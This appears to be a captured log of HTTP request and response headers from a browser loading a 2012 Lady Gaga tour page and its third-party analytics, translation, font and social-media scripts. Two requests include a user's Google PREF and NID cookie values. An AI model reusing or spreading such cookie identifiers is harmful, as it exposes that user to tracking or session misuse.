GET /clientapps/v2/auth.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39983
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:58 GMT
Expires: Tue, 06 Nov 2012 07:55:44 GMT
Content-Length: 14561
Connection: keep-alive
GET /clientapps/v2/user-list.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39985
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:57 GMT
Expires: Tue, 06 Nov 2012 07:55:42 GMT
Content-Length: 15427
Connection: keep-alive
GET /clientapps/v2/curation.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39984
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:52:56 GMT
Expires: Tue, 06 Nov 2012 07:55:43 GMT
Content-Length: 17902
Connection: keep-alive
GET /libs/v1/forum/edit.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:38:39 GMT
Etag: 7135f1ebf356dc557aa80d000b4004fa
Vary: Accept-Encoding
X-Trans-Id: tx7cea8c4a504d46b8889a83fbd2ed5f2d
X-Timestamp: 1349707119.37394
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 24 Sep 2012 20:07:11 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 2044
Cache-Control: public, max-age=508
Expires: Mon, 05 Nov 2012 19:10:35 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /clientapps/v2/plugins/curation.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39983
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:11 GMT
Expires: Tue, 06 Nov 2012 07:55:44 GMT
Content-Length: 3426
Connection: keep-alive
GET /clientapps/v2/plugins/like.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39983
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Tue, 06 Nov 2012 07:55:44 GMT
Content-Length: 2349
Connection: keep-alive
GET /clientapps/v2/plugins/user-privileges.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39982
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Tue, 06 Nov 2012 07:55:45 GMT
Content-Length: 1649
Connection: keep-alive
GET /clientapps/v2/plugins/user-ban.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39981
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Tue, 06 Nov 2012 07:55:46 GMT
Content-Length: 1358
Connection: keep-alive
GET /clientapps/v2/plugins/community-flag.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39980
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Tue, 06 Nov 2012 07:55:47 GMT
Content-Length: 1648
Connection: keep-alive
GET /clientapps/v2/plugins/metadata-manager.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39978
Date: Mon, 05 Nov 2012 19:02:07 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:10 GMT
Expires: Tue, 06 Nov 2012 07:55:49 GMT
Content-Length: 1411
Connection: keep-alive
GET /libs/v1/forum/core.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 17 Oct 2012 17:24:42 GMT
Etag: 2d154789dd42c02053dd4a32a916598e
Vary: Accept-Encoding
X-Timestamp: 1350494682.11721
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 17 Oct 2012 17:23:55 GMT
Accept-Ranges: bytes
X-Trans-Id: tx674711c7103d4e7f833e6566f5bdeb54
Content-Encoding: gzip
Content-Length: 32589
Cache-Control: public, max-age=254
Expires: Mon, 05 Nov 2012 19:06:21 GMT
Date: Mon, 05 Nov 2012 19:02:07 GMT
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.7&utms=4&utmn=783029781&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=2118856348&utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=4&amp;utmn=783029781&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=2118856348&amp;utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:21:39 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 409228
Server: GFE/2.0
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:09 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352142129282 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352142129282 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Mon, 05 Nov 2012 19:02:09 GMT
Expires: Mon, 12 Nov 2012 19:02:09 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /p.gif?s=1&k=mxd3gmg&ht=tk&h=www.ladygaga.com&f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&a=163479&_=1352142129746 HTTP/1.1

Host: p.typekit.net
GET /p.gif?s=1&amp;k=mxd3gmg&amp;ht=tk&amp;h=www.ladygaga.com&amp;f=1817.632.635.634.631.637.630.636.633.762.761.6364.6365&amp;a=163479&amp;_=1352142129746 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=604800
Date: Mon, 05 Nov 2012 19:02:09 GMT
Expires: Mon, 12 Nov 2012 19:02:09 GMT
Last-Modified: Tue, 31 Jul 2012 23:01:31 GMT
Server: ECS (arn/46E4)
X-Cache: HIT
Content-Length: 35
GET /__utm.gif?utmwv=5.3.7&utms=5&utmn=1725972692&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=1211511472&utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=5&amp;utmn=1725972692&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=1211511472&amp;utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:16:19 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 409551
Server: GFE/2.0
GET /translate_static/js/element/main.js HTTP/1.1

Host: translate.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Sat, 02 Jun 2012 02:49:04 GMT
Date: Mon, 05 Nov 2012 18:30:12 GMT
Expires: Mon, 05 Nov 2012 19:30:12 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 1542
X-XSS-Protection: 1; mode=block
Age: 1919
Cache-Control: public, max-age=3600
GET /translate_static/css/translateelement.css HTTP/1.1

Host: translate.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Tue, 22 May 2012 18:21:40 GMT
Date: Mon, 05 Nov 2012 18:14:54 GMT
Expires: Mon, 05 Nov 2012 19:14:54 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 3559
X-XSS-Protection: 1; mode=block
Age: 2837
Cache-Control: public, max-age=3600
GET /en_US/all.js HTTP/1.1

Host: connect.facebook.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Etag: &quot;fc51f94cdbf009b04fb241bf40b9bdb2&quot;
Content-Encoding: gzip
X-FB-Debug: Ze4uOtFznc8Il1pb3IymhcMOS/zv7xf+K/IFkwfGEYU=
Content-Length: 57950
Cache-Control: public, max-age=463
Expires: Mon, 05 Nov 2012 19:09:54 GMT
Date: Mon, 05 Nov 2012 19:02:11 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /__utm.gif?utmwv=5.3.7&utms=6&utmn=950553284&utmhn=www.ladygaga.com&utmcs=UTF-8&utmsr=1176x885&utmvp=15x15&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&utmhid=91975187&utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&utmp=%2Fbornthiswayball%2F&utmac=UA-1162848-67&utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=6&amp;utmn=950553284&amp;utmhn=www.ladygaga.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=15x15&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=LADY%20GAGA%20%7C%20BORN%20THIS%20WAY%20BALL&amp;utmhid=91975187&amp;utmr=http%3A%2F%2Fwww.frozen-backside.de%2Findex.php%3Fpage%3DIndex&amp;utmp=%2Fbornthiswayball%2F&amp;utmac=UA-1162848-67&amp;utmcc=__utma%3D70702477.1916483056.1352142125.1352142125.1352142125.1%3B%2B__utmz%3D70702477.1352142125.1.1.utmcsr%3Dfrozen-backside.de%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Findex.php%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:35:34 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 408398
Server: GFE/2.0
GET /translate_static/js/element/10/element_main.js HTTP/1.1

Host: translate.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Sat, 02 Jun 2012 01:19:15 GMT
Date: Mon, 05 Nov 2012 18:11:13 GMT
Expires: Mon, 05 Nov 2012 19:11:13 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 75700
X-XSS-Protection: 1; mode=block
Age: 3060
Cache-Control: public, max-age=3600
GET /connect/xd_arbiter.php?version=13 HTTP/1.1

Host: static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: Q0l8wZr+CVlG2JSb8pq0zhh5Gx0vmRh8cRoAwPYxLWE=
Content-Length: 9716
Vary: Accept-Encoding
Cache-Control: public, max-age=31534765
Expires: Tue, 05 Nov 2013 18:41:39 GMT
Date: Mon, 05 Nov 2012 19:02:14 GMT
Connection: keep-alive
GET /_/apps-static/_/js/gapi/plusone/rt=j/ver=LVKXSTHtfNo.no./sv=1/am=!EjuVRaiyNaqIjBsSTg/d=1/rs=AItRSTMaHj7RZX2LeVz2LCZZ1iNU9jXqGw/cb=gapi.loaded_0 HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;1084316013&quot;
Expires: Mon, 03 Dec 2012 02:46:58 GMT
Date: Sat, 03 Nov 2012 02:46:58 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 27793
Age: 231316
GET /connect/xd_arbiter.php?version=13 HTTP/1.1

Host: s-static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: yAKH1hRsZNGvvYFkjx2vYQxCRYD6Dtr6NEnZdYL/3F0=
Content-Length: 9716
Vary: Accept-Encoding
Cache-Control: public, max-age=31534734
Expires: Tue, 05 Nov 2013 18:41:10 GMT
Date: Mon, 05 Nov 2012 19:02:16 GMT
Connection: keep-alive
GET /libs/v1/notifications/notifications.css HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Mon, 08 Oct 2012 14:37:01 GMT
Etag: 363263c372483f23fea3cc060d3e78fc
Vary: Accept-Encoding
X-Trans-Id: txe4ac1fb0cc1f46d18f991d02f81b68f6
X-Timestamp: 1349707021.87135
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 01 Dec 2011 00:32:32 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 875
Cache-Control: public, max-age=74
Expires: Mon, 05 Nov 2012 19:03:34 GMT
Date: Mon, 05 Nov 2012 19:02:20 GMT
Connection: keep-alive
GET /s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png HTTP/1.1

Host: ssl.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
